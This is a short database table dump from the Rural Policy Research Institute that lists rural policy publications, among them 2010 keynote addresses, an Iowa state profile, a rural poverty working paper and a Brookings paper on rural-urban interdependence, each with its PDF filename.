| NULL | Keynote presentation to the Southwest Kansas Economic Summit, Garden City, KS<BR>October 7, 2010 | Fluharty_GardenCity_Oct2010.pdf | 335 | Crafting a Rural Regional Innovation Strategy for Southwest Kansas |
| NULL | Updated State Profile for Iowa<BR>October 10, 2008 | Iowa2.pdf | 212 | Iowa State Profile Update |
| NULL | Rural Communities, Rural Regions, and the Rural-Urban Continuum.&nbsp; Keynote address to the Maryland Rural Health Association by RUPRI President Chuck Fluharty.<BR>October 21, 2010. | Fluharty_MarylandRHA_October10.pdf | 336 | Re-Calibrating a Place-Primacy in Public Policy |
| NULL | Two-page overview of the RUPRI Rural Futures Lab<BR>September, 2010 | Rural_Futures_Lab.pdf | 319 | RUPRI Rural Futures Lab Overview |
| NULL | RUPRI Rural Poverty Research Center Working Paper #05-05, June 2005<BR>Liz Davis and Stacie Bosley | WP0505.pdf | 179 | The Impact of the 1990s Economic Boom on Less-Educated Workers in Rural America |
| NULL | Paper prepared for <EM><A href="" target=_blank>The Blueprint for American Prosperity</A></EM>, Metropolitan Policy Program at the Brookings Institution.<BR>Brian Dabson, RUPRI President and CEO<BR>November 2007 | Dabson_Brookings.pdf | 150 | Rural-Urban Interdependence: Why Metropolitan and Rural America Need Each Other |
Database: rupri
Table: States
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